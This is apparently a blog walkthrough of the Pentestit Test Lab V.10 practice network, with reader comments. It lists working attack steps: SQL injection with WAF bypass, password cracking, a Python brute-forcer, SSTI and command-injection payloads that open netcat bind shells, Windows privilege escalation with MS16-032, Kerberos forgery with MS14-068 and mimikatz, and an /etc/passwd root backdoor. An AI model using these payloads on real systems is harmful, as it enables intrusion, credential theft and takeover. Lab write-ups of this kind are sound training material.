[PENTESTIT] Test Lab V.10

INTRODUCTION

This new Lab of Pentestit was really hard but really interesting for me. They simulate a real company and a real penetration testing too. I spent many hours learning some new things and I want to thank the people who gave me hints to reach some of the tokens.

NETWORK

Network diagram: https://lab.pentestit.ru/images/labs/TL10_map.png
First of all, after connecting to the VPN, I launched nmap to discover the available ports:

nmap 192.168.101.9 -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 15:03 CET
Nmap scan report for gds.lab (192.168.101.9)
Host is up (0.077s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
443/tcp  open  https
8100/tcp open  xprint-server

Nmap done: 1 IP address (1 host up) scanned in 386.76 seconds

Browsing to http://192.168.101.9 I got a redirect to http://store.gds.lab but I couldn’t resolve the hostname. So I added that into /etc/hosts:

192.168.101.9 gds.lab
192.168.101.9 store.gds.lab

Now http://store.gds.lab works. After that I checked http://gds.lab too and I discovered an ownCloud page which told me to add http://cloud.gds.lab as trusted host, so I added another line into /etc/hosts:

192.168.101.9 gds.lab
192.168.101.9 store.gds.lab
192.168.101.9 cloud.gds.lab

MAIL

I spent lot of time on store without discover anything. I decided to skip to http://gds.lab:443 and analyzing the source code I discovered this comment:

Alfred Modlin said use this template

Also I found two email into the Contact page, so I have three e-mail to test:

s.locklear@gds.lab
j.wise@gds.lab
a.modlin@gds.lab

I browsed to http://gds.lab:8100 and I intercepted the POST request with BurpSuite. I sent the request to Intruder with the following payload:

POST / HTTP/1.1
Host: gds.lab:8100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://gds.lab:8100/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12655615391746434301144945042
Content-Length: 775

-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="FormCharset"

utf-8
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Username"

a.modlin
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Password"

§password§
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="SessionSkin"

*
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="login"

Enter
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Skin"

Viewpoint
-----------------------------12655615391746434301144945042--

I used john.txt as wordlist and after some minutes I discovered the password: justdoit. I logged into the account and I discovered the token! There was also an email from j.wise:

Hi there!
Here is the app we talked about.
It's kinda like Google Authenticator - but the second factor is an SSH port currently opened.
So we have only one port opened for ssh at 172.16.0.1 at a time. This app will show it to you.
Please, check it on your phone for any bugs/suggestions and send them to me.

So the app can reveal us the test-ssh port.

SITE

Now I focused myself to http://gds.lab:443. I discovered an SQLi on http://gds.lab:443/post.php?id=1. Seems to be that there was a WAF which was protecting the site. After some tries I found that random case could bypass it. First of all I retrieved the number of columns, after some tries I discovered that they are 2:

http://gds.lab:443/post.php?id=') UNioN All SeLect CONcaT('TITLE'), CONcaT('POST')#

Remember to URL encode the string from ‘) to the end.

Then I discovered tables names:

http://gds.lab:443/post.php?id=') UNioN SeLect 1, GrouP_CONcaT(TabLe_nAmE) FroM InfOrMatIoN_scHemA.TabLes WheRe TabLe_sCheMa=database()#

I got this:

posts,users 

Cool! The table users it’s my target. Let’s discover columns names:

http://gds.lab:443/post.php?id=') UNioN SeLect 1, GrouP_CONcaT(ColUmN_nAmE) FroM InfOrMatIoN_scHemA.ColuMns WheRe TabLe_NaME='users'#

This is the output:

id,username,password 

And now the latest query:

http://gds.lab:443/post.php?id=') UNioN All SeLect username, PasSwoRd FroM site.users#

Perfect! I found username, which is e.lindsey and an hash:

$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Now I need to crack this. First of all I detected the hash with hash-identifier and it is an MD5(Unix), then I cracked it with hashcat:

optirun hashcat -a 0 -m 500 hash.txt rockyou.txt

And I got this:

lindsey123

Now I can login into site from /admin with e.lindsey:lindsey123 credentials and at the end I got the token.

SSH

Now I switched to ssh. With the credentials found I connected to it:

ssh e.lindsey@192.168.101.9

Searching around I found /data folder with /users subdirectory but when I was into it I couldn’t list files because I didn’t have read permissions. So I tried to bruteforce directories with a bash script:

#!/bin/bash
path="$1"

while IFS='' read -r directory || [[ -n "$directory" ]]; do
    if [ -d "$path/$directory" ]; then
      printf "[+] Directory $path/$directory exists!\n"
    fi
done < "$2"

I copied it into /tmp and I typed:

chmod +x brutedir.sh
./brutedir.sh /data/users users.txt

Then I bruted directories for each users found, in particular:

./brutedir.sh /data/users/rross raft-large-directories-lowercase.txt

At the end I found /data/users/rross/docs and I could list files inside the directory. Token found! I also found ssh key of a.modlin in /data/users/a.modlin.

TEST-SSH

To reach test-ssh I need to login into ssh and discover the hidden port. I decompiled the apk and I discovered that the port was changing randomly. So form the ssh box I typed:

ssh a.modlin@172.16.0.1 -p $(nmap -sT 172.16.0.1 -p 1-65535 | grep open | cut -d "/" -f 1) -i a.modlin_key

Now I am logged into test-ssh. I listed the files and I found the token.

BLOG

For blog I created an SSH tunnel:

ssh -L 8080:192.168.0.4:80 e.lindsey@192.168.101.9

Then I connected to http://localhost:8080 and a Joomla blog appeared. I searched a lot for that and finally I found this exploit which redirected me to https://github.com/XiphosResearch/exploits/tree/master/Joomraa. So I downloaded the python script and I executed it:

python joomraa.py -u reversebrain -p password -e mail@host.com http://localhost:8080

Then I logged in into http://localhost:8080/administrator page with the credentials that I created. Now I navigated to articles and I found an unpublished one, the token was the alias!

CAPTCHA

Again I opened an SSH tunnel:

ssh -L 8080:192.168.0.7:80 e.lindsey@192.168.101.9

Now I navigated to http://localhost:8080 and a blank image with an input form appeared. Checking /robots.txt I found this:

User-agent: *
Disallow: *.bak

Also I found /readme.txt:

Notice: don't forget - destroy all cached captcha every %time% via system.

When I tried to open the image location I got “500 Internal Server Error”, so I tried to remove .png and I added .bak but I still receive the same error, so I opened a private browser tab to avoid cookie problems and finally I downloaded captcha.bak. I opened it with a text editor:

file_put_contents($session_path. /captcha, serialize($_SESSION)); 
file_put_contents($session_path. /($_SESSION).php, ?php system($_GET[session]); ? 

It contains PHP code, the second line tell me that an RCE vulnerability exists, the backdoor is the “($_SESSION).php” file. So I closed and reopened the private tab, I copied the blank image location, I deleted captcha.png and I added ($_SESSION).php. Then I tried http://localhost:8080/sources/e092a74ec21bca8810d8b24e4995e5bda8ba37a83576663ac6d44f1fdc108af8eafc3582b3eeb8332ba7c9bccbb7d0f5ed1ca39bdf5924b4fe1552fb57f4ffc0ac348bb77cb613a82358e31e886fc48e77c50e795963d5f2e74192428d46f5d600fd4f/($_SESSION).php?session=ls and it worked! So I created a bind shell:

http://localhost:8080/sources/e092a74ec21bca8810d8b24e4995e5bda8ba37a83576663ac6d44f1fdc108af8eafc3582b3eeb8332ba7c9bccbb7d0f5ed1ca39bdf5924b4fe1552fb57f4ffc0ac348bb77cb613a82358e31e886fc48e77c50e795963d5f2e74192428d46f5d600fd4f/($_SESSION).php?session=nc -lvp 1234 -e /bin/bash

Then I connected to the shell from SSH machine:

nc -v 192.168.0.7 1234

Going back two directories Ii found token.token file.

HALL OF FAME

The next target is hall-of-fame. I created another SSH tunnel:

ssh -L 8080:192.168.0.8:80 e.lindsey@192.168.101.9

Bruteforcing directories and files I found /backup/passwords.txt:

creator:liverpool
developer:s2shj1BvYq83k6M

Logging with developer credentials I got a redirect to a page which displayed this:

$_SESSION contents:
Array ( [username] => editor [login] => editor [loggedIn] => 1 )
/dev/ password: 0bf190ffdc397fd51334d908845fbb1

So I browsed to /dev and I used dev:0bf190ffdc397fd51334d908845fbb1 as credentials. Then after lot of hours I discovered a SSTI vulnerability on hname paramter. I found a great article which explains in details what is it. At the end I found that the template in use was Twig. To get a shell I typed this:

http://localhost:8080/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("nc -lvp 1234 -e /bin/bash")}}

From the SSH box I ran:

nc -v 192.168.0.8 1234

Then find the token:

find / -name "*token*" 2>/dev/null

At the end I found the location:

/usr/share/nginx/token_70f01ee6914535591d7c4c96b7004709.txt

NEWS

Again another SSH tunnel:

ssh -L 8080:192.168.0.5:80 e.lindsey@192.168.101.9

Playing around on the site I discovered a reset password tool and I discovered two email:

user@gds.lab
admin@gds.lab

First of all I resetted the user password then I logged in with user@gds.lab:user credentials, after that I clicked on User Info:

Token  Your princess is in another castle!

Seems that we need to login as admin and click on User Info. Bruteforcing directories I found /old which haslogin, logout and reset password links. The latest one didn’t work. So first of all I resetted the admin password from the main page, then I logged in into /old with admin:admin credentials and at the and I browsed to http://localhost:8080/user_info.php and I found the token.

STORE

For store I browsed to http://store.gds.lab and I analyzed it for hours without success, then I created an SSH tunnel to dev-store:

ssh -L 8080:172.16.0.5:80 e.lindsey@192.168.101.9

It is OpenCart CMS, so I found a public exploit and I checked the SQLi:

http://localhost:8080/index.php?route=product/product&product_id=53%27

This is the output:

Fatal error: Uncaught exception 'Exception' with message 'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Error No: 1064
select * from oc_download_stats where d_id=2 and p_id=53'' in /var/www/system/library/db/mysqli.php:40 Stack trace: #0 /var/www/system/library/db.php(16): DB\MySQLi->query('select * from o...', Array) #1 /var/www/catalog/controller/product/download_stat.php(39): DB->query('select * from o...') #2 /var/www/system/storage/modification/catalog/controller/product/product.php(499): DownloadStatRecord->load('2', '53'') #3 [internal function]: ControllerProductProduct->index() #4 /var/www/system/storage/modification/system/engine/action.php(51): call_user_func_array(Array, Array) #5 /var/www/catalog/controller/startup/router.php(25): Action->execute(Object(Registry)) #6 [internal function]: ControllerStartupRouter->index() #7 /var/www/system/storage/modification/system/engine/action.php(51): cal in /var/www/system/library/db/mysqli.php on line 40

Fire up sqlmap:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id

Then I displayed all databases:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id --dbs

Select the target db and display the tables:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id -D testlab --tables

There is a token table, dump it:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id -D testlab -T token --dump

Token found!

WEB-CONTROL

Fist of all I connected to SSH box and I scanned open ports:

nmap 192.168.0.6

This is the output:

Starting Nmap 6.00 ( http://nmap.org ) at 2016-12-09 12:26 MSK
Nmap scan report for 192.168.0.6
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1503/tcp open  imtc-mcs

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

So I tried to connect to port 1503:

nc 192.168.0.6 1503

A login prompt appeared. I wrote a python script to bruteforce it:

import socket,sys,datetime,os

# Check parameters
if len(sys.argv) != 3:
     sys.stderr.write("[INFO] Usage: " + sys.argv[0] + "userlist passwordlist\n")
     sys.exit(1)

# Logo
print "[INFO] Web-Control bruter\n"

# Check list files
if not os.path.exists(sys.argv[1]):
     sys.stderr.write("[ERROR] userlist was not found!\n")
     sys.exit(1)

if not os.path.exists(sys.argv[2]):
     sys.stderr.write("[ERROR] passwordlist was not found!\n")
     sys.exit(1)

else:
     print "[INFO] Loading your lists...\n"

# Bruter
print "[INFO] Start bruting...\n"

with open(sys.argv[1]) as user_file:
    for user in user_file:
        with open(sys.argv[2]) as password_file:
            for password in password_file:
                # Connection
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect(('192.168.0.6', 1503))
                except:
                    print "[ERROR] Can't connect to host!\n"

                # Request username
                data = ""
                while True:
                    tmp = s.recv(1)
                    if tmp == "":
                        break
                    data += tmp
                    if data.endswith("Enter login: "):
                        break

                # Send username
                s.send(user)

                # Request password
                data = ""
                while True:
                    tmp = s.recv(1)
                    if tmp == "":
                        break
                    data += tmp
                    if data.endswith("Enter password: "):
                        break

                # Send password
                s.send(password)

                # Answer
                answer = s.recv(6)

                if "Error!" not in answer:
                    print "[BINGO!]\nUsername: " + user + "Password: " + password
                    sys.exit(1)

                s.close()

I uploaded it on SSH with top_shortlist.txt as user list and john.txt as password list (I had to remove a blank line with nano to get script works). After some times I got credentials:

admin:macintosh

So I logged in and this is what I got:

Select option:
    1. First script
    2. Second script
    3.Third script

To exit type -1.
Option: 

Seems a command injection vulnerability, after some tries I typed:

1|nc -lvp 1234 -e /bin/bash

Then I opened another SSH session and I connected to the shell:

nc -v 192.168.0.6 1234

To find the token:

find / -name "*token*" 2>/dev/null

Then I found it:

/var/opt/token.txt

WIN-TERM

First of all I created an SSH proxy and I configured proxychains locally:

ssh -D 8080 e.lindsey@192.168.101.9

Then I connected to the Windows machine with rdesktop:

rdesktop -r disk:share=/home/reversebrain/share 192.168.0.3

After some tries I found credentials (default password complexity):

GDS-OFFICE\e.lindsey
Lindsey123

On the desktop there were two icons: TrueCrypt and KeePass so I think I had to mount the hidden volume and then open KeePass database. I found a privilege escalation exploit, so I downloaded and copied it into /home/reversebrain/share so I could transfer it into Windows machine Desktop from Network panel. Then I opened the cmd and I typed:

cd Desktop
powershell -ExecutionPolicy Bypass
Import-Module .\exploit.ps1
Invoke-MS16-032

Now I have an elevated prompt. I changed dir to C:\Users\Administrator\Desktop, then I listed file and I found automount.bat. I executed it and TrueCrypt volume was mount. Now I opened KeePass, I opened mywork_gds.kbdx from TrueCrypt volume and when I prompt for a password I selected the key mywork_gds.key. Now I got token from General tab and rross cloud credentials:

rross:wwDr6rte

WIN-DC0

Now I need to exploit the Domain Controller. After some research I found a good YouTube video. From the exploited Windows machine I typed:

net user /Domain

I discovered the domain:

WIN-DC0.gds-office.lab

Now get the SID:

wmic useraccount where name="e.lindsey" get sid

This is the output:

SID
S-1-5-21-421115581-889488229-2938181853-1131

Then I switched to Kali box and I downloaded pykek. Then I typed:

sudo proxychains python ms14-068.py -u e.lindsey@gds-office.lab -p Lindsey123 -s S-1-5-21-421115581-889488229-2938181853-1131 -d 192.168.0.2

Then I uploaded mimikatz to the Windows machine, I opened the cmd, I changed directory to mimikatz and I typed:

klist purge
mimikatz.exe "Kerberos::ptc TGT_e.lindsey@gds-office.lab.ccache"

Now the ticket is injected! Let’s mount C drive:

net use \\WIN-DC0.gds-office.lab\admin$
net use K: \\WIN-DC0.gds-office.lab\C$

Now I mounted the C drive of WIN-DC0, browse to K:\Users\Administrator\Documents and I found token.txt.

CLOUD

Do you remember rross credentials?  I connected to SSH with e.lindsey then I typed:

ssh rross@172.16.0.3 -p 2222

I spent lot of time here and I discovered that there are 5 lxc, we need to connect to lxc1 to perform a privilege escalation. So login some times with rross from SSH until you got lxc1 hostname. Now I need to escalate privileges. Check which file can we execute with root privileges:

sudo -l

This is the output:

Matching Defaults entries for rross on lxc1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rross may run the following commands on lxc1:
    (root) NOPASSWD: /opt/scripts/clear_nginx_logs.sh

There is a script that can be executed with root privileges. Let’s check if we can write into it:

ls -l /opt/scripts/clear_nginx_logs.sh

The output:

-rwxrwxrwx 1 root root 46 Dec  9 13:30 /opt/scripts/clear_nginx_logs.sh

Wow! I could write to it. From my local box I generated a password:

openssl passwd -1 -salt xyz admin

Now I edited the script and I added the following line:

echo "reversebrain:\$1\$xyz\$R7n0ak3ptkexFwuStJOw9/:0:0:reversebrain:/root:/bin/bash" >> /etc/passwd

Execute it:

sudo /ope/scripts/clear_nginx_logs.sh

Now login as root:

su reversebrain

Now I need to escape from the lxc, I found an interesting PDF. On page 16 I found an exploit written in C, I copied it and I pasted into /tmp. Now compile it (remember to add ; at the end on return 0):

gcc -g -Wall secopenchroot.c -o secopenchroot

Then execute it:

chmod +x seconpenchroot
./secopenchroot /tmp "02 00 00 00 00 00 00 00"

Then cd to root and got the latest token!

Advertisements
[PENTESTIT] Test Lab V.10

11 thoughts on “[PENTESTIT] Test Lab V.10

  1. ellococareloco says:

    How did you get the SID of the domain user with this command? I have tried it and it does not find it since it is in the nonlocal domain.
    wmic useraccount where name=”e.lindsey” get sid
    Probe with WHERE (name = “e.lindsey” and domain = “gds-office”) without results

    Like

  2. Makis says:

    Hello,

    I tried using your script @ Web Control (11th Challenge) but it doesn’t work.. what do you mean you need to delete a blank line ? Can you post it on a gist or somewhere else as code? Thanks in advance and for the beautiful guide!

    Best Regards,
    E.

    Like

      1. Makis says:

        Hmmm I used a custom wordlist as passwordlist ( no blank lines )and a world list of users got from the other machines.. It has the following structure ( no blank lines )

        admin
        user
        a.modlin
        e.lindsey
        g.leone
        k.barth
        m.howard
        rross
        s.locklear

        Will try what you suggested though, with the mentioned wordlists

        Like

  3. Makis says:

    Hmmm I took the script as it is from your webpage , and here you can see http://pastebin.com/bShxChBB the test userlist ( as already pasted ) and i just try @ a password.txt file only 123456 password and macintosh (which is the right one – should pop [BINGO]) but I can’t get it to work.. :/ sorry I am not familiar with python. I execute the script as following : python login_bruteforce.py users.txt passwords.txt . Any ideas ? Thanks for your time.

    Like

  4. Makis says:

    It’s okay! I am just starting to study on penetration test and your guides (here and @vulnhub) are a hell of help. Will check back here tommorow 🙂 Goodnight

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s